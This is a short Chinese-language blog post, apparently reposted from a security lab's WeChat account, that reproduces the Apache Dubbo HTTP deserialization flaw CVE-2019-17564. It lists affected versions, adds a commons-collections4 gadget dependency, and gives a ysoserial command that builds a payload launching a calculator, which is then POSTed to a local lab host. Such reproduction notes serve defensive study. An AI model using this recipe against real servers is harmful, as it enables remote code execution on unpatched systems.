1.Dubbo框架简介
2.CVE-2019-17564
1.漏洞简介
Apache Dubbo⽀持多种协议,推荐官⽅使⽤Dubbo协议。Apache Dubbo HTTP协议中的⼀个反序
列化漏洞(CVE-2019-17564),漏洞该主要原因的在于当Apache Dubbo启⽤HTTP协议之后,Apache Dubbo对HTTP数据处理不当:对数据编码、序列化、反序列化,利⽤Spring HTTP Invoker框架处理,未经任何检查直接反序列化数据,当项⽬包中存在可⽤的gadgets时即可导致远程代码执⾏。
2.影响范围
2.7.0 <= Apache Dubbo <= 2.7.4.1
2.6.0 <= Apache Dubbo <= 2.6.7
Apache Dubbo = 2.5.x
3.环境搭建
我们再往⾥⾯添加本地触发gadgets,这⾥导⼊commons-collections4-4.0恶意类依赖。
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-collections4</artifactId> <version>4.0</version>
</dependency>
我们⾸先⽤yso 来⽣成⼀个序列化的payload:
java-jarysoserial-0.0.6-SNAPSHOT-all.jarCommonsCollections4"deepin-calculator">/tmp/payload.ser
而后⽤postman往
http://192.168.199.246:8090/org.apache.dubbo.samples.http.api.DemoService
POST我们⽣成的
payload.ser
本文始发于微信公众号(雷石安全实验室):Dubbo反序列化漏洞复现分析
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论